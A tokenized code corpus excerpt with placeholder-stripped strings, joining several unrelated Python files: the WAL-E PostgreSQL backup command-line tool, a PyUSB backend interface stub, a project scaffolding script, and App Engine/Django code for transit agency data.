<NUM_LIT:0> <EOL> error_msgs . append ( textwrap . fill ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> raise EnvironmentError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> with open ( os . devnull , '<STR_LIT:w>' ) as nullf : <EOL> for program in to_check : <EOL> try : <EOL> if program is PSQL_BIN : <EOL> psql_csv_run ( '<STR_LIT>' , error_handler = psql_err_handler ) <EOL> else : <EOL> if program is PV_BIN : <EOL> extra_args = [ '<STR_LIT>' ] <EOL> else : <EOL> extra_args = [ ] <EOL> proc = popen_sp ( [ program ] + extra_args , <EOL> stdout = nullf , stderr = nullf , <EOL> stdin = subprocess . PIPE ) <EOL> proc . stdin . close ( ) <EOL> proc . wait ( ) <EOL> except EnvironmentError : <EOL> could_not_run . append ( program ) <EOL> if could_not_run : <EOL> error_msgs . append ( <EOL> '<STR_LIT>' + <EOL> '<STR_LIT:U+002CU+0020>' . join ( could_not_run ) ) <EOL> if error_msgs : <EOL> raise UserException ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:\n>' . join ( error_msgs ) ) <EOL> return None <EOL> def extract_segment ( text_with_extractable_segment ) : <EOL> from wal_e . storage import BASE_BACKUP_REGEXP <EOL> from wal_e . storage . base import SegmentNumber <EOL> match = re . match ( BASE_BACKUP_REGEXP , text_with_extractable_segment ) <EOL> if match is None : <EOL> return None <EOL> else : <EOL> groupdict = match . groupdict ( ) <EOL> return SegmentNumber ( log = groupdict [ '<STR_LIT>' ] , seg = groupdict [ '<STR_LIT>' ] ) <EOL> def build_parser ( ) : <EOL> parser = argparse . ArgumentParser ( <EOL> formatter_class = argparse . RawDescriptionHelpFormatter , <EOL> description = __doc__ ) <EOL> aws_group = parser . add_mutually_exclusive_group ( ) <EOL> aws_group . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> aws_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' ) <EOL> subparsers = parser . add_subparsers ( title = '<STR_LIT>' , <EOL> dest = '<STR_LIT>' ) <EOL> backup_fetchpush_parent = argparse . ArgumentParser ( add_help = False ) <EOL> backup_fetchpush_parent . add_argument ( '<STR_LIT>' , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> backup_fetchpush_parent . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , type = int , default = <NUM_LIT:4> , <EOL> help = '<STR_LIT>' ) <EOL> subparsers . add_parser ( '<STR_LIT:version>' , help = '<STR_LIT>' ) <EOL> backup_list_nodetail_parent = argparse . ArgumentParser ( add_help = False ) <EOL> wal_fetchpush_parent = argparse . ArgumentParser ( add_help = False ) <EOL> wal_fetchpush_parent . add_argument ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> backup_fetch_parser = subparsers . add_parser ( <EOL> '<STR_LIT>' , help = '<STR_LIT>' , <EOL> parents = [ backup_fetchpush_parent , backup_list_nodetail_parent ] ) <EOL> backup_list_parser = subparsers . add_parser ( <EOL> '<STR_LIT>' , parents = [ backup_list_nodetail_parent ] , <EOL> help = '<STR_LIT>' ) <EOL> backup_push_parser = subparsers . add_parser ( <EOL> '<STR_LIT>' , help = '<STR_LIT>' , <EOL> parents = [ backup_fetchpush_parent ] ) <EOL> backup_push_parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> type = int , default = None ) <EOL> backup_push_parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> help = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> default = False ) <EOL> wal_push_parser = subparsers . add_parser ( <EOL> '<STR_LIT>' , help = '<STR_LIT>' , <EOL> parents = [ wal_fetchpush_parent ] ) <EOL> wal_push_parser . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , type = int , default = <NUM_LIT:8> , <EOL> help = '<STR_LIT>' ) <EOL> backup_fetch_parser . add_argument ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> backup_fetch_parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> help = '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> default = False ) <EOL> backup_fetch_parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> help = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> type = str , <EOL> default = None ) <EOL> backup_list_parser . add_argument ( <EOL> '<STR_LIT>' , nargs = '<STR_LIT:?>' , default = None , <EOL> help = '<STR_LIT>' ) <EOL> backup_list_parser . add_argument ( <EOL> '<STR_LIT>' , default = False , action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' ) <EOL> wal_fetch_parser = subparsers . add_parser ( <EOL> '<STR_LIT>' , help = '<STR_LIT>' , <EOL> parents = [ wal_fetchpush_parent ] ) <EOL> wal_fetch_parser . add_argument ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> wal_fetch_parser . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , type = int , default = <NUM_LIT:8> , <EOL> help = '<STR_LIT>' ) <EOL> wal_prefetch_parser = subparsers . add_parser ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> wal_prefetch_parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> wal_prefetch_parser . add_argument ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> delete_parser = subparsers . add_parser ( <EOL> '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> delete_parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> help = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> delete_parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> help = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> delete_subparsers = delete_parser . add_subparsers ( <EOL> title = '<STR_LIT>' , <EOL> description = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> dest = '<STR_LIT>' ) <EOL> delete_before_parser = delete_subparsers . add_parser ( <EOL> '<STR_LIT>' , help = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> delete_before_parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> delete_retain_parser = delete_subparsers . add_parser ( <EOL> '<STR_LIT>' , help = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> delete_retain_parser . add_argument ( <EOL> '<STR_LIT>' , type = int , <EOL> help = '<STR_LIT>' ) <EOL> delete_subparsers . add_parser ( <EOL> '<STR_LIT>' , <EOL> help = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> delete_subparsers . add_parser ( <EOL> '<STR_LIT>' , <EOL> help = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> return parser <EOL> def _config_hint_generate ( optname , both_env_and_param ) : <EOL> """<STR_LIT>""" <EOL> env = optname . replace ( '<STR_LIT:->' , '<STR_LIT:_>' ) . upper ( ) <EOL> if both_env_and_param : <EOL> option = '<STR_LIT>' + optname . lower ( ) <EOL> return ( '<STR_LIT>' <EOL> . format ( option , env ) ) <EOL> else : <EOL> return '<STR_LIT>' . format ( env ) <EOL> def s3_explicit_creds ( args ) : <EOL> access_key = args . aws_access_key_id or os . getenv ( '<STR_LIT>' ) <EOL> if access_key is None : <EOL> raise UserException ( <EOL> msg = '<STR_LIT>' , <EOL> hint = ( _config_hint_generate ( '<STR_LIT>' , True ) ) ) <EOL> secret_key = os . getenv ( '<STR_LIT>' ) <EOL> if secret_key is None : <EOL> raise UserException ( <EOL> msg = '<STR_LIT>' , <EOL> hint = _config_hint_generate ( '<STR_LIT>' , False ) ) <EOL> security_token = os . getenv ( '<STR_LIT>' ) <EOL> from wal_e . blobstore import s3 <EOL> return s3 . Credentials ( access_key , secret_key , security_token ) <EOL> def s3_instance_profile ( args ) : <EOL> from wal_e . blobstore import s3 <EOL> assert args . aws_instance_profile <EOL> return s3 . InstanceProfileCredentials ( ) <EOL> def configure_backup_cxt ( args ) : <EOL> prefix = ( args . s3_prefix or args . wabs_prefix <EOL> or os . getenv ( '<STR_LIT>' ) or os . getenv ( '<STR_LIT>' ) <EOL> or os . getenv ( '<STR_LIT>' ) ) <EOL> if prefix is None : <EOL> raise UserException ( <EOL> msg = '<STR_LIT>' , <EOL> hint = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> ) <EOL> store = storage . StorageLayout ( prefix ) <EOL> gpg_key_id = args . gpg_key_id or os . getenv ( '<STR_LIT>' ) <EOL> if gpg_key_id is not None : <EOL> external_program_check ( [ GPG_BIN ] ) <EOL> if store . is_s3 : <EOL> if args . aws_instance_profile : <EOL> creds = s3_instance_profile ( args ) <EOL> else : <EOL> creds = s3_explicit_creds ( args ) <EOL> from wal_e . blobstore import s3 <EOL> s3 . sigv4_check_apply ( ) <EOL> from wal_e . operator import s3_operator <EOL> return s3_operator . S3Backup ( store , creds , gpg_key_id ) <EOL> elif store . is_wabs : <EOL> account_name = args . wabs_account_name or os . getenv ( '<STR_LIT>' ) <EOL> if account_name is None : <EOL> raise UserException ( <EOL> msg = '<STR_LIT>' , <EOL> hint = _config_hint_generate ( '<STR_LIT>' , True ) ) <EOL> access_key = os . getenv ( '<STR_LIT>' ) <EOL> access_token = os . getenv ( '<STR_LIT>' ) <EOL> if not ( access_key or access_token ) : <EOL> raise UserException ( <EOL> msg = '<STR_LIT>' , <EOL> hint = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) ) <EOL> from wal_e . blobstore import wabs <EOL> from wal_e . operator . wabs_operator import WABSBackup <EOL> creds = wabs . Credentials ( account_name , access_key , access_token ) <EOL> return WABSBackup ( store , creds , gpg_key_id ) <EOL> elif store . is_swift : <EOL> from wal_e . blobstore import swift <EOL> from wal_e . operator . swift_operator import SwiftBackup <EOL> creds = swift . Credentials ( <EOL> os . getenv ( '<STR_LIT>' ) , <EOL> os . getenv ( '<STR_LIT>' ) , <EOL> os . getenv ( '<STR_LIT>' ) , <EOL> os . getenv ( '<STR_LIT>' ) , <EOL> os . getenv ( '<STR_LIT>' ) , <EOL> os . getenv ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> os . getenv ( '<STR_LIT>' , '<STR_LIT:2>' ) , <EOL> ) <EOL> return SwiftBackup ( store , creds , gpg_key_id ) <EOL> else : <EOL> raise UserCritical ( <EOL> msg = '<STR_LIT>' , <EOL> hint = '<STR_LIT>' ) <EOL> def monkeypatch_tarfile_copyfileobj ( ) : <EOL> """<STR_LIT>""" <EOL> import tarfile <EOL> from wal_e import copyfileobj <EOL> tarfile . copyfileobj = copyfileobj . copyfileobj <EOL> def render_subcommand ( args ) : <EOL> """<STR_LIT>""" <EOL> if args . subcommand == '<STR_LIT>' : <EOL> return '<STR_LIT>' + args . delete_subcommand <EOL> else : <EOL> return args . subcommand <EOL> def main ( ) : <EOL> parser = build_parser ( ) <EOL> args = parser . parse_args ( ) <EOL> subcommand = args . subcommand <EOL> if args . terse : <EOL> log_help . set_level ( logging . WARNING ) <EOL> if subcommand == '<STR_LIT:version>' : <EOL> import pkgutil <EOL> print pkgutil . get_data ( '<STR_LIT>' , '<STR_LIT>' ) . strip ( ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> logger . info ( msg = '<STR_LIT>' , <EOL> detail = ( '<STR_LIT>' <EOL> . format ( render_subcommand ( args ) ) ) ) <EOL> try : <EOL> backup_cxt = configure_backup_cxt ( args ) <EOL> if subcommand == '<STR_LIT>' : <EOL> monkeypatch_tarfile_copyfileobj ( ) <EOL> external_program_check ( [ LZOP_BIN ] ) <EOL> backup_cxt . database_fetch ( <EOL> args . PG_CLUSTER_DIRECTORY , <EOL> args . BACKUP_NAME , <EOL> blind_restore = args . blind_restore , <EOL> restore_spec = args . restore_spec , <EOL> pool_size = args . pool_size ) <EOL> elif subcommand == '<STR_LIT>' : <EOL> backup_cxt . backup_list ( query = args . QUERY , detail = args . detail ) <EOL> elif subcommand == '<STR_LIT>' : <EOL> monkeypatch_tarfile_copyfileobj ( ) <EOL> if args . while_offline : <EOL> external_program_check ( [ CONFIG_BIN ] ) <EOL> parser = PgControlDataParser ( args . PG_CLUSTER_DIRECTORY ) <EOL> controldata_bin = parser . controldata_bin ( ) <EOL> external_programs = [ <EOL> LZOP_BIN , <EOL> PV_BIN , <EOL> controldata_bin ] <EOL> else : <EOL> external_programs = [ LZOP_BIN , PSQL_BIN , PV_BIN ] <EOL> external_program_check ( external_programs ) <EOL> rate_limit = args . rate_limit <EOL> while_offline = args . while_offline <EOL> backup_cxt . database_backup ( <EOL> args . PG_CLUSTER_DIRECTORY , <EOL> rate_limit = rate_limit , <EOL> while_offline = while_offline , <EOL> pool_size = args . pool_size ) <EOL> elif subcommand == '<STR_LIT>' : <EOL> external_program_check ( [ LZOP_BIN ] ) <EOL> res = backup_cxt . wal_restore ( args . WAL_SEGMENT , <EOL> args . WAL_DESTINATION , <EOL> args . prefetch ) <EOL> if not res : <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> elif subcommand == '<STR_LIT>' : <EOL> external_program_check ( [ LZOP_BIN ] ) <EOL> backup_cxt . wal_prefetch ( args . BASE_DIRECTORY , args . SEGMENT ) <EOL> elif subcommand == '<STR_LIT>' : <EOL> external_program_check ( [ LZOP_BIN ] ) <EOL> backup_cxt . wal_archive ( args . WAL_SEGMENT , <EOL> concurrency = args . pool_size ) <EOL> elif subcommand == '<STR_LIT>' : <EOL> if args . dry_run is False and args . confirm is True : <EOL> logger . info ( msg = '<STR_LIT>' ) <EOL> is_dry_run_really = False <EOL> else : <EOL> logger . info ( msg = '<STR_LIT>' ) <EOL> is_dry_run_really = True <EOL> import boto . s3 . key <EOL> import boto . s3 . bucket <EOL> def just_error ( * args , ** kwargs ) : <EOL> assert False , ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> boto . s3 . key . Key . delete = just_error <EOL> boto . s3 . bucket . Bucket . delete_keys = just_error <EOL> if args . delete_subcommand == '<STR_LIT>' : <EOL> backup_cxt . delete_old_versions ( is_dry_run_really ) <EOL> elif args . delete_subcommand == '<STR_LIT>' : <EOL> backup_cxt . delete_all ( is_dry_run_really ) <EOL> elif args . delete_subcommand == '<STR_LIT>' : <EOL> backup_cxt . delete_with_retention ( is_dry_run_really , <EOL> args . NUM_TO_RETAIN ) <EOL> elif args . delete_subcommand == '<STR_LIT>' : <EOL> segment_info = extract_segment ( args . BEFORE_SEGMENT_EXCLUSIVE ) <EOL> assert segment_info is not None <EOL> backup_cxt . delete_before ( is_dry_run_really , segment_info ) <EOL> else : <EOL> assert False , '<STR_LIT>' <EOL> else : <EOL> logger . error ( msg = '<STR_LIT>' , <EOL> detail = ( '<STR_LIT>' <EOL> . format ( subcommand ) ) , <EOL> hint = '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT> ) <EOL> if backup_cxt . exceptions : <EOL> for exc in backup_cxt . exceptions [ : - <NUM_LIT:1> ] : <EOL> if isinstance ( exc , UserException ) : <EOL> logger . log ( level = exc . severity , <EOL> msg = exc . msg , detail = exc . detail , hint = exc . hint ) <EOL> else : <EOL> logger . error ( msg = exc ) <EOL> raise backup_cxt . exceptions [ - <NUM_LIT:1> ] <EOL> except UserException , e : <EOL> logger . log ( level = e . severity , <EOL> msg = e . msg , detail = e . detail , hint = e . hint ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> except Exception , e : <EOL> logger . critical ( <EOL> msg = '<STR_LIT>' , <EOL> detail = '<STR_LIT>' . join ( traceback . format_exception ( * sys . exc_info ( ) ) ) ) <EOL> sys . exit ( <NUM_LIT:2> ) </s>
<s> from wal_e . worker . s3 . s3_deleter import Deleter <EOL> from wal_e . worker . s3 . s3_worker import BackupFetcher <EOL> from wal_e . worker . s3 . s3_worker import BackupList <EOL> from wal_e . worker . s3 . s3_worker import DeleteFromContext <EOL> from wal_e . worker . s3 . s3_worker import TarPartitionLister <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] </s>
<s> r"""<STR_LIT>""" <EOL> import usb . _objfinalizer as _objfinalizer <EOL> __author__ = '<STR_LIT>' <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def _not_implemented ( func ) : <EOL> raise NotImplementedError ( func . __name__ ) <EOL> class IBackend ( _objfinalizer . AutoFinalizedObject ) : <EOL> r"""<STR_LIT>""" <EOL> def enumerate_devices ( self ) : <EOL> r"""<STR_LIT>""" <EOL> _not_implemented ( self . enumerate_devices ) <EOL> def get_device_descriptor ( self , dev ) : <EOL> r"""<STR_LIT>""" <EOL> _not_implemented ( self . get_device_descriptor ) <EOL> def get_configuration_descriptor ( self , dev , config ) : <EOL> r"""<STR_LIT>""" <EOL> _not_implemented ( self . get_configuration_descriptor ) <EOL> def get_interface_descriptor ( self , dev , intf , alt , config ) : <EOL> r"""<STR_LIT>""" <EOL> _not_implemented ( self . get_interface_descriptor ) <EOL> def get_endpoint_descriptor ( self , dev , ep , intf , alt , config ) : <EOL> r"""<STR_LIT>""" <EOL> _not_implemented ( self . get_endpoint_descriptor ) <EOL> def open_device ( self , dev ) : <EOL> r"""<STR_LIT>""" <EOL> _not_implemented ( self . open_device ) <EOL> def close_device ( self , dev_handle ) : <EOL> r"""<STR_LIT>""" <EOL> _not_implemented ( self . close_device ) <EOL> def set_configuration ( self , dev_handle , config_value ) : <EOL> r"""<STR_LIT>""" <EOL> _not_implemented ( self . set_configuration ) <EOL> def get_configuration ( self , dev_handle ) : <EOL> r"""<STR_LIT>""" <EOL> _not_implemented ( self . get_configuration ) <EOL> def set_interface_altsetting ( self , dev_handle , intf , altsetting ) : <EOL> r"""<STR_LIT>""" <EOL> _not_implemented ( self . set_interface_altsetting ) <EOL> def claim_interface ( self , dev_handle , intf ) : <EOL> r"""<STR_LIT>""" <EOL> _not_implemented ( self . claim_interface ) <EOL> def release_interface ( self , dev_handle , intf ) : <EOL> r"""<STR_LIT>""" <EOL> _not_implemented ( self . release_interface ) <EOL> def bulk_write ( self , dev_handle , ep , intf , data , timeout ) : <EOL> r"""<STR_LIT>""" <EOL> _not_implemented ( self . bulk_write ) <EOL> def bulk_read ( self , dev_handle , ep , intf , buff , timeout ) : <EOL> r"""<STR_LIT>""" <EOL> _not_implemented ( self . bulk_read ) <EOL> def intr_write ( self , dev_handle , ep , intf , data , timeout ) : <EOL> r"""<STR_LIT>""" <EOL> _not_implemented ( self . intr_write ) <EOL> def intr_read ( self , dev_handle , ep , intf , size , timeout ) : <EOL> r"""<STR_LIT>""" <EOL> _not_implemented ( self . intr_read ) <EOL> def iso_write ( self , dev_handle , ep , intf , data , timeout ) : <EOL> r"""<STR_LIT>""" <EOL> _not_implemented ( self . iso_write ) <EOL> def iso_read ( self , dev_handle , ep , intf , size , timeout ) : <EOL> r"""<STR_LIT>""" <EOL> _not_implemented ( self . iso_read ) <EOL> def ctrl_transfer ( self , <EOL> dev_handle , <EOL> bmRequestType , <EOL> bRequest , <EOL> wValue , <EOL> wIndex , <EOL> data , <EOL> timeout ) : <EOL> r"""<STR_LIT>""" <EOL> _not_implemented ( self . ctrl_transfer ) <EOL> def clear_halt ( self , dev_handle , ep ) : <EOL> r"""<STR_LIT>""" <EOL> _not_implemented ( self . clear_halt ) <EOL> def reset_device ( self , dev_handle ) : <EOL> r"""<STR_LIT>""" <EOL> _not_implemented ( self . reset_device ) <EOL> def is_kernel_driver_active ( self , dev_handle , intf ) : <EOL> r"""<STR_LIT>""" <EOL> _not_implemented ( self . is_kernel_driver_active ) <EOL> def detach_kernel_driver ( self , dev_handle , intf ) : <EOL> r"""<STR_LIT>""" <EOL> _not_implemented ( self . detach_kernel_driver ) <EOL> def attach_kernel_driver ( self , dev_handle , intf ) : <EOL> r"""<STR_LIT>""" <EOL> _not_implemented ( self . attach_kernel_driver ) </s>
<s> import os <EOL> import re <EOL> import sys <EOL> import random <EOL> from . import core <EOL> README = """<STR_LIT>""" <EOL> Makefile = """<STR_LIT>""" <EOL> setup = """<STR_LIT>""" <EOL> myprogramd = """<STR_LIT>""" <EOL> myprogramctl = """<STR_LIT>""" <EOL> def init_new_project ( program ) : <EOL> if os . listdir ( '<STR_LIT:.>' ) != [ ] : <EOL> print ( '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> name = os . path . basename ( os . getcwd ( ) ) <EOL> src_dir = '<STR_LIT>' . format ( name ) <EOL> os . mkdir ( src_dir ) <EOL> with open ( '<STR_LIT>' , '<STR_LIT:w>' ) as fh : <EOL> fh . write ( README . replace ( '<STR_LIT>' , name ) . lstrip ( ) ) <EOL> with open ( '<STR_LIT>' , '<STR_LIT:w>' ) as fh : <EOL> fh . write ( setup . replace ( '<STR_LIT>' , name ) . lstrip ( ) ) <EOL> with open ( '<STR_LIT>' , '<STR_LIT:w>' ) as fh : <EOL> data = Makefile . replace ( '<STR_LIT>' , name ) . lstrip ( ) <EOL> data = re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , data ) <EOL> fh . write ( data ) <EOL> files = [ <EOL> ( '<STR_LIT>' , myprogramd ) , <EOL> ( '<STR_LIT>' , myprogramctl ) ] <EOL> random_string = '<STR_LIT>' . join ( random . sample ( [ chr ( i ) for i in range ( <NUM_LIT> , <NUM_LIT> ) ] , <NUM_LIT:10> ) ) <EOL> for filename , var in files : <EOL> filename = filename . replace ( '<STR_LIT>' , name ) <EOL> with open ( os . path . join ( src_dir , filename ) , '<STR_LIT:w>' ) as fh : <EOL> var = var . replace ( '<STR_LIT>' , name ) . lstrip ( ) <EOL> var = var . replace ( '<STR_LIT>' , random_string ) <EOL> fh . write ( var ) <EOL> with open ( os . path . join ( src_dir , '<STR_LIT>' ) , '<STR_LIT:w>' ) as fh : <EOL> fh . write ( "<STR_LIT>" ) <EOL> with open ( os . path . join ( src_dir , '<STR_LIT>' ) , '<STR_LIT:w>' ) as fh : <EOL> pass <EOL> def main ( ) : <EOL> program = core . CtlProgram ( <EOL> '<STR_LIT>' , None ) <EOL> program . add_command ( '<STR_LIT>' , init_new_project ) <EOL> program . run ( loop = False ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> from google . appengine . ext import db <EOL> class NamedStat ( db . Model ) : <EOL> name = db . StringProperty ( ) <EOL> value = db . FloatProperty ( ) <EOL> @ staticmethod <EOL> def get_stat ( name ) : <EOL> stats = NamedStat . all ( ) . filter ( "<STR_LIT>" , name ) . get ( ) <EOL> if stats is None : <EOL> stats = NamedStat ( name = name , value = <NUM_LIT:0.0> ) <EOL> try : <EOL> stats . put ( ) <EOL> except db . TimeoutException : <EOL> stats . put ( ) <EOL> return stats <EOL> @ staticmethod <EOL> def get_value ( name ) : <EOL> return NamedStat . get_stat ( name ) . value <EOL> @ staticmethod <EOL> def set_value ( name , value ) : <EOL> stats = NamedStat . get_stat ( name ) <EOL> stats . value = value <EOL> stats . put ( ) <EOL> @ staticmethod <EOL> def increment ( name ) : <EOL> stats = NamedStat . get_stat ( name ) <EOL> stats . value = stats . value + <NUM_LIT:1.0> <EOL> try : <EOL> stats . put ( ) <EOL> except db . TimeoutException : <EOL> stats . put ( ) <EOL> return stats . value </s>
<s> import time <EOL> import logging <EOL> from django . http import HttpResponse , HttpResponseRedirect <EOL> from django . conf import settings <EOL> from google . appengine . ext import db <EOL> from google . appengine . api import memcache <EOL> from google . appengine . api import users <EOL> from . . decorators import memcache_parameterized_view_response <EOL> from . . forms import AgencyForm <EOL> from . . models import Agency , FeedReference , TransitApp <EOL> from . . utils . view import render_to_response , redirect_to , not_implemented , bad_request , render_to_json <EOL> from . . utils . misc import uniquify , chunk_sequence <EOL> from . . utils . geocode import geocode_name <EOL> from StringIO import StringIO <EOL> import csv <EOL> def edit_agency ( request , agency_id = None ) : <EOL> if agency_id is not None : <EOL> agency = Agency . get_by_id ( int ( agency_id ) ) <EOL> else : <EOL> agency = None <EOL> if request . method == '<STR_LIT:POST>' : <EOL> form = AgencyForm ( request . POST ) <EOL> if form . is_valid ( ) : <EOL> if agency is None : <EOL> agency = Agency ( name = form . cleaned_data [ '<STR_LIT:name>' ] , <EOL> city = form . cleaned_data [ '<STR_LIT>' ] , <EOL> state = form . cleaned_data [ '<STR_LIT:state>' ] , <EOL> country = form . cleaned_data [ '<STR_LIT>' ] ) <EOL> agency . name = form . cleaned_data [ '<STR_LIT:name>' ] <EOL> agency . short_name = form . cleaned_data [ '<STR_LIT>' ] <EOL> agency . city = form . cleaned_data [ '<STR_LIT>' ] <EOL> agency . state = form . cleaned_data [ '<STR_LIT:state>' ] <EOL> agency . country = form . cleaned_data [ '<STR_LIT>' ] if form . cleaned_data [ '<STR_LIT>' ] != "<STR_LIT>" else None <EOL> agency . postal_code = form . cleaned_data [ '<STR_LIT>' ] <EOL> agency . address = form . cleaned_data [ '<STR_LIT:address>' ] <EOL> agency . agency_url = form . cleaned_data [ '<STR_LIT>' ] if form . cleaned_data [ '<STR_LIT>' ] != "<STR_LIT>" else None <EOL> agency . executive = form . cleaned_data [ '<STR_LIT>' ] <EOL> agency . executive_email = form . cleaned_data [ '<STR_LIT>' ] if form . cleaned_data [ '<STR_LIT>' ] != "<STR_LIT>" else None <EOL> agency . twitter = form . cleaned_data [ '<STR_LIT>' ] <EOL> agency . contact_email = form . cleaned_data [ '<STR_LIT>' ] if form . cleaned_data [ '<STR_LIT>' ] != "<STR_LIT>" else None <EOL> agency . updated = form . cleaned_data [ '<STR_LIT>' ] <EOL> agency . phone = form . cleaned_data [ '<STR_LIT>' ] <EOL> agency . gtfs_data_exchange_id = form . cleaned_data [ '<STR_LIT>' ] . split ( "<STR_LIT:U+002C>" ) if form . cleaned_data [ '<STR_LIT>' ] != "<STR_LIT>" else [ ] <EOL> agency . dev_site = form . cleaned_data [ '<STR_LIT>' ] if form . cleaned_data [ '<STR_LIT>' ] != "<STR_LIT>" else None <EOL> agency . arrival_data = form . cleaned_data [ '<STR_LIT>' ] if form . cleaned_data [ '<STR_LIT>' ] != "<STR_LIT>" else None <EOL> agency . position_data = form . cleaned_data [ '<STR_LIT>' ] if form . cleaned_data [ '<STR_LIT>' ] != "<STR_LIT>" else None <EOL> agency . standard_license = form . cleaned_data [ '<STR_LIT>' ] if form . cleaned_data [ '<STR_LIT>' ] != "<STR_LIT>" else None <EOL> agency . location = geocode_name ( agency . city , agency . state ) <EOL> agency . update_location ( ) <EOL> agency . update_slugs ( ) <EOL> agency . put ( ) <EOL> else : <EOL> if agency is None : <EOL> form = AgencyForm ( ) <EOL> else : <EOL> form = AgencyForm ( initial = { '<STR_LIT:name>' : agency . name , <EOL> '<STR_LIT>' : agency . short_name , <EOL> '<STR_LIT>' : agency . city , <EOL> '<STR_LIT:state>' : agency . state , <EOL> '<STR_LIT>' : agency . country , <EOL> '<STR_LIT>' : agency . postal_code , <EOL> '<STR_LIT:address>' : agency . address , <EOL> '<STR_LIT>' : agency . agency_url , <EOL> '<STR_LIT>' : agency . executive , <EOL> '<STR_LIT>' : agency . executive_email , <EOL> '<STR_LIT>' : agency . twitter , <EOL> '<STR_LIT>' : agency . contact_email , <EOL> '<STR_LIT>' : agency . updated , <EOL> '<STR_LIT>' : agency . phone , <EOL> '<STR_LIT>' : "<STR_LIT:U+002C>" . join ( agency . gtfs_data_exchange_id ) , <EOL> '<STR_LIT>' : agency . dev_site , <EOL> '<STR_LIT>' : agency . arrival_data , <EOL> '<STR_LIT>' : agency . position_data , <EOL> '<STR_LIT>' : agency . standard_license , } ) <EOL> return render_to_response ( request , "<STR_LIT>" , { '<STR_LIT>' : agency , '<STR_LIT>' : form } ) <EOL> def agency_app_counts ( request ) : <EOL> return render_to_json ( TransitApp . agency_app_counts ( ) ) <EOL> def safe_str ( item ) : <EOL> """<STR_LIT>""" <EOL> if type ( item ) == str or type ( item ) == unicode : <EOL> return item . encode ( "<STR_LIT:utf8>" ) <EOL> else : <EOL> return str ( item ) <EOL> @ memcache_parameterized_view_response ( time = settings 